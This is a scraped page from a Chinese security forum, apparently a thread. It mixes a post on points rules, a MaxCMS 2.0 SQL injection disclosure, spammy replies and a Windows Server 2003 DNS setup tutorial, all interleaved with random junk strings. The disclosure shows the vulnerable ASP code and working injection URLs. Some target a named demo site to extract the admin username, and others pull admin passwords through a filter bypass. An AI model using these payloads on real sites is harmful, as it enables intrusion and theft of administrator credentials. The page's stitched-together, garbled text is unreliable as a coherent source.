最近看过此主题的会员

返回列表 发帖

非安全中国网论坛积分策略调整

现在经济不太景气,为了拉动内需,对论坛积分进行如下:
- q+ J* m# A- N; ^9 o0 ~- w
# F* T- k4 n) n& i# N7 j
1.发布文章得一枚金币。: g& S3 d# v0 C+ s! N1 d
2.下载附件需要一枚金币。: Z  D' Y$ h5 y0 ]3 o  E
3.回复主题没有金币。(杜绝下载党,伸手党分子)9 A8 X9 ?! D; V# w  Q% H

& y" E0 f* e4 X( F% U7 |
( L: Z/ D; s1 B2 }- K5 E如何获取金币:/ [: X/ V( ]) T0 r  y
1.发布原创文章,原创作品。
" ?8 Z( T, c% n7 L9 j; |( U" |2.可以在新人区发布一些帮助新人学习的文章。' H) V# n, |4 j6 R
3.可以在新人区里面回答新人提出的问题。
  I6 H8 U$ t) C) q8 c; S4.会员引导的朋友需要注册之后, 会员才会增加贡献值
) I+ v) Y3 Z& s- o只要用户把特定的 url 链接推荐给其他朋友,并引导其他人访问非安全中国网论坛并且注册帐号当然对于,好资源,好原创。我们还是特别支持的!因为有你精彩,才有我们的存在。- e( ~4 _* A9 j. S! @
不安全所以安全——非安全中国网

 

您可能还想看的主题:

新人报道!

最全最完美的黑链代码写法大全

Asprain论坛注册用户上传图片漏洞

来过

论坛内容及无效ID将进行一次清理

Nginx配置文件详解

最近神马的论坛 神马的QQ群有木有蛋疼的家伙?

【原创首发】每天就我一个人,我会孤单的

分享你的行业见闻,快速获得非安全中积分及邀请码

GIF 录像 录制软件。。。实测。。好用。。。

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:pow78781发表,本帖发表者pow78781符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者pow78781和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

马克斯CMS2.0beta (maxcms)SQL注入漏洞
关键字:首页-马克斯CMS2.0 这个系统是国内非常流行的视频点播系统,之前的1.5版本漏洞非常多,2.0版本在安全方面有所提高,但是依然有漏洞存在。 看代码 incajax.asp dim action : action = getForm("action", "get") response.Charset="gbk" Select  case action     case "newslist" : viewNewsList     case "newscontent" : viewNewsContent     case "digg","tread" : scoreVideo(action)     case "reporterr" : reportErr     case "hit" : updateHit     case else : main End Select terminateAllObjects …… Sub scoreVideo(operType)     dim sql,id,digg,returnValue : id=getForm("id","get")     ‘通过get方式获取id的值     if rCookie("maxcms2_score"&id)="ok" then die "havescore"     if isNul(id) then die "err"     'on error resume next     digg=conn.db("select m_digg from {pre}data where m_id="&id,"execute")(0)     ‘ 参数id,没有过滤就带入sql语句进行查询     if err then digg=0 : err.clear()     if not isNum(id) then echoSaveStr "safe" else id=clng(id)     ‘ 查询到digg,注意返回的内容 ……利用就很简单了,构造sql语句提交(默认结构是m_manager,m_username,m_pwd,根据返回的内容判断就可以了。如果构造的语句是正确的,就返回类似警告 你提交的数据有非法字符,你的IP【xxxx】已被记录,操作 构造的语句不正确,则返回500 Poc : 正确的: http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=97     不正确的: http://demo.maxcms.net/inc/ajax.asp?action=digg&id=1%20and%20(select%20top%201%20asc(mid(m_username,1,1))%20from%20m_manager)=99其实随便找个注射工具跑一下就ok了

# F- f1 e4 r6 l" ]: ]另外一处注射 Sub checkPower     dim loginValidate,rsObj : loginValidate = "maxcms2.0"     err.clear     on error resume next     set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&amp;rCookie("m_username")&amp;"'","execute")     loginValidate = md5(getAgent&amp;getIp&amp;rsObj(0))     if err then wCookie "check"&amp;rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"     if rCookie("check"&amp;rCookie("m_username"))<>loginValidate then wCookie "check"&amp;rCookie("m_username"),"" : die "<script>top.location.href='index.asp?action=login';</script>"     checkManagerLevel  rsObj(1)     set rsObj=nothing End Sub其中 Function rCookie(cookieName)     rCookie = request.cookies(cookieName) End Function通过伪造cookie中m_username的值可以进行注射 不过要知道后台管理目录,默认是/admin/,多个页面可以触发改函数 比如 /admin/admin_ajax.asp 因为sql检测过滤的时候是关键字判断  可是很多重要的关键字后面又加上了个个空格 这样就可以通过寂寞的刺猬发现的用()替代空格的方法绕过 http://localhost/play.asp?id=-999+union(select(password),2,3,4,5,6,7,8,9,0,1+from+[zt_admin]) http://localhost/play.asp?id=-999+union(select(adminname),2,3,4,5,6,7,8,9,0,1+from+[zt_admin])
4 T) n- w* g& G
3 D) j& g+ \% t8 v4 }4 j; ]
: A# g' }5 V6 {) y4 z0 f$ ~9 d5 a6 D! o. Z/ D3 ^" A
0 r3 `  d+ [! _; z8 C2 G2 w' O' O
; g! f+ b6 d( P" u. G/ h* g

3 Q( E6 {. o! V) r( S$ v& B7 y$ ^# O1 O
4 m( K! {! x) b" {; M7 E0 o1 ]
! n/ V) x9 ~/ Z- S4 |. o( L. q% i
$ b7 _; P: q8 V+ [8 o
' ^1 k3 L* g; Q( Q: X) q( \

* R/ i% k8 @+ `/ b
  z) u% \4 a. t& V$ ?" P8 ^, C6 f& u/ t# }- F

7 k, I. P( D. f* h
! T, a( L4 `. L! l8 l. H' w) c
% E& m3 k: b5 L/ L! G) Z6 F6 t4 P+ y! T# @
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

手把手教你装Linux系统-设置虚拟机工具
<P align=center>
& Y! l, y6 u% X0 Y+ f$ @2 @
4 t- e7 }: j; |  h( Thttp://www.sitedir.com.cn/video/8.swf[/quote]
7 A$ T: X6 v9 d, X' r0 j9 g* _, l# O$ _

( Z+ j- N' T8 K) a, P8 u% c
" W. l" V1 K9 S# o2 B8 K. T
/ [2 S& D, I# J) A" f& ^7 f4 A5 V
* ]$ q- z4 F/ l* \
+ ~, V4 `  ?3 S0 ]; F8 r1 W3 ^
# X$ o( k% T# y8 `0 a3 t) w
- a0 f" {& R5 V

/ O$ Q" J* u, p0 U' c
' ?* U) `: f, K/ A' c/ q7 M9 x2 G
/ r) y2 J- q+ d% M; r
" F; m8 r) D% k! L3 K  V
# H7 d: N' k# P% J7 Q; O5 D( H( N0 C9 h' ]
/ E$ Q& C8 d. R# ]5 j
, \% m& x+ J. e% z, K
5 \4 s$ z6 w7 h5 i- ^6 a" W
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

阿额~~~这些人都疯特勒~~~~~
1 c! w3 L# {" K) G$ }9 `( f6 W7 c  Y5 V

& S. A$ S% ~" ?6 |+ F& a+ @7 M5 x& L! L$ h2 f
5 l9 D: b" h; z( g4 [* f1 a1 G

& Q' _/ i' M* G4 b; Z. Z8 k1 p; R* ~& }$ S$ t6 T# i
. P* ^5 s+ o3 m* ^% m& R8 b
" b  p! E6 v  X; j- t
4 N( v* ]& u- p3 R1 k

7 ^  D4 u( `; z0 o
( j; |* {. h2 e6 w! e" {
/ [9 M) ^  ~4 X3 e7 y; v; c( {; \. ~' e

* h- ^; Y! z$ b* g4 q
$ \. @" a0 D) ~6 y! V
) Q, ]$ a! p$ f9 i+ x- D0 O
4 S$ W0 f; Z8 K  i) I6 p- \% j0 D! v4 r' _# H  e+ D; m
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

我想要申请做站长论坛的斑主:www.sitedirsec.com 。。。。。。。。。 " s/ o* F( ?4 }+ U& g. h
: z& o& ^' Z% i
9 p* Z0 d# `! G* `  ?- s

+ @" v0 X% S' {6 j
: A3 b  K, D( F/ F
# F1 m4 h; G) J9 \1 g2 B* E) x
+ [  k0 Y3 y6 _5 b! E3 `; d0 U2 z$ |9 f3 z
7 O/ B, j3 ?; A8 g8 h9 D2 b7 F

- Y7 s# F6 R) M' r, V6 H8 F5 t1 P) P! }$ w
# |% |& O# v+ k+ s$ c- Y
8 J9 ^. C9 Z5 j, _7 w
* f7 C* t# ]% X  V: `

: k( P: t" q/ U2 i' y' i
0 m2 l% ~/ U# @7 E
- a. Q' e6 h4 D! B
  p5 _7 b0 e# v7 {' u: K& N/ ~( `7 T' R' v5 {6 w' G# B% g
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

DNS服务器的管理与配置基础技巧
计算机在网络上通讯时本来只能识别如“123.123.123.123”之类的数字地址,那么为什么当我们打开浏览器,在地址栏中输入域名dns.qy.com.cn后,就能看到我们所需要的页面呢? 0 a2 H6 s8 e0 R( C% V/ O1 ?
其实,只是一个IP地址和域名相互“翻译”的过程。前者得建立一个指向相应IP地址的域名映射记录;对于后者,此记录已经建立并且在生效了。而这种“翻译”记录的建立,则需要用到同一种被称之为“DNS服务器”的计算机。

( |( [' C6 [( x: v& c: ]( Y
DNS服务器用于TCP/IP网络中,它用来通过用户友好的名称代替难记的IP地址以定位计算机和服务。因此,只要你需要用到某个域名的地方,你都得首先确保已为此名字在DNS服务器中作好了相应的和IP地址的映射工作。
5 u; D) J9 g4 r( ?' I7 @
本文将以Windows2003自带的DNS服务为例,谈下如何在局域网中完成这个“翻译系统”的组建工作。
8 m, B' ^# e/ ~# C5 J
一、添加DNS服务
, Q6 T( F) f- b- a7 F8 V
当你安装好Win2003之后,DNS服务并没有被添加进去。依次打开“开始→控制面板→添加/删除程序→添加/删除Windows组件,单击添加或删除Windows组件。在组件列表中,单击网络服务(但不要选中或清除该复选框),然后单击详细信息。单击已选中域名系统(DNS),然后单击确定。
3 _+ N4 B; {3 M$ r* i8 t
单击下一步,得到提示后,将WindowsServer2003CD-ROM插入计算机的驱动器。安装完成时,在完成Windows组件向导页上单击完成。

0 J" r. S6 G. Q0 S0 j
二、配置DNS服务器
& Z! R( R  @0 Z, l1 P0 l
要使用Microsoft管理控制台(MMC)中的DNS管理单元配置DNS,请按照下列步骤操作:单击开始,指向程序,指向管理工具,然后单击DNS。右击正向搜索区域,然后单击新建区域。当“新建区域向导”启动后,单击下一步。接着将提示您选择区域类型。

3 r: N/ J' k: {# d8 @, d
区域类型包括:

6 P2 w+ I5 t: I9 n7 B- L
主要区域:创建可以直接在此服务器上更新的区域的副本。此区域信息存储在一个.dns文本文件中。

4 y$ ^/ n/ |* B. v0 |+ L0 t
辅助区域:标准辅助区域从它的主DNS服务器复制所有信息。主DNS服务器可以是为区域复制而配置的Active Directory区域、主要区域或辅助区域。辅助DNS服务器上的区域数据无法修改。所有数据都是从主DNS服务器复制而来。

% b( V' Z; D1 N$ M; j# L
存根区域:存根区域只包含标识该区域的权威DNS服务器所需的资源记录。这些资源记录包括名称服务器(NS)、起始授权机构(SOA)和可能的glue主机(A)记录。
) P9 Z5 I5 s: }: D; p
Active Directory中还有一个用来存储区域的选项。此选项仅在DNS服务器是域控制器时可用。
& L5 \9 I6 @/ K, W6 i3 x% {
新的正向搜索区域必须是主要区域或Active Directory集成的区域,以便它能够接受动态更新。单击主要,然后单击下一步。
: m: n/ q- E6 M1 U) o- [0 a7 G
新区域包含该基于Active Directory的域的定位器记录。区域名称必须与基于Active Directory的域的名称相同,或者是该名称的逻辑DNS容器。例如,如果基于Active Directory的域的名称为“support.microsoft.com”,那么有效的区域名称只能是“support.microsoft.com”,接受新区域文件的默认名称。
* L( j7 g! T- C: K. V! d
如何移除根DNS区域

5 J  b& v$ E9 T0 `  `' P- w
运行WindowsServer2003的DNS服务器在它的名称解析过程中遵循特定的步骤。首先查询它的高速缓存,然后检查它的区域记录,接下来将请求发送到转发器,最后使用根服务器尝试解析。
8 j9 a7 A1 j& `7 A8 ]/ Q
默认情况下,Microsoft DNS服务器连接到Internet以便用根提示进一步处理DNS请求。当使用Dcpromo工具将服务器提升为域控制器时,域控制器需要DNS。如果在提升过程中安装DNS,会创建一个根区域。这个根区域向您的DNS服务器表明它是一个根Internet服务器。因此,您的DNS服务器在名称解析过程中并不使用转发器或根提示。
6 }- Y& m+ T# N  m7 ]
这时可以选择将根DNS区域移除。单击开始,指向管理工具,然后单击DNS。展开Server Name,其中Serve Name是服务器的名称,单击属性,然后展开正向搜索区域。右击"."区域,然后单击删除即可。

8 h& \# y3 u1 A
如何配置转发器

4 Z/ t4 ~# \9 U+ C  e7 X
WindowsServer2003可以充分利用DNS转发器。该功能将DNS请求转发到外部服务器。如果DNS服务器无法在其区域中找到资源记录,可以将请求发送给另一台DNS服务器,以进一步尝试解析。一种常见情况是配置到您的ISP的DNS服务器的转发器。
" I# }4 r  i( I. ^. M/ R
单击开始,指向管理工具,然后单击DNS。右击Server Name,其中Server Name是服务器的名称,然后单击转发器选项卡。单击DNS域列表中的一个DNS域。或者单击新建,在DNS域框中键入希望转发查询的DNS域的名称,然后单击确定。
+ Z, x5 V# M# T3 W
在所选域的转发器IP地址框中,键入希望转发到的第一个DNS服务器的IP地址,然后单击添加。
- y/ B) g. V( R' k; ^" X
DNS是Internet上使用的核心名称解析工具,负责主机名称和Internet地址之间的解析。进行必要的合理的设置,会使我们的工作达到事半功倍的效果。

; j: ~0 P9 B- ~3 L$ `: J) R' T5 y% H) e# |

& A" ~1 h* W* m# O# ?8 p
& d& N% f) s1 `# p
2 B$ k" Q9 B& x6 w& @# Q$ d$ V& v% n0 O$ [( X: n

* D& n6 ^/ c2 X" }+ z3 q( P1 a4 b3 l' C7 {6 H2 S6 [. W5 n

" M' l( i. V* Q, x4 B7 [0 ?: d9 u7 Z$ T' H

5 r' F! o6 v% h3 ?: r! R
% M3 \; T" w# M: v- m
' X8 h$ x: Q. s0 E# g. z
9 d+ ]9 p. R* t; c$ I. z3 Z4 I
/ g. ?+ o$ `; |) ^7 h; M0 L; ~
, R( G3 c! L5 U  l& @0 V; E! Y3 t
5 g2 g( X4 ^! g4 h/ \* ~* R5 ~2 @2 R' I- c) v" p  L5 E* E, \
8 y1 L- e8 o- K) u3 @% z
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表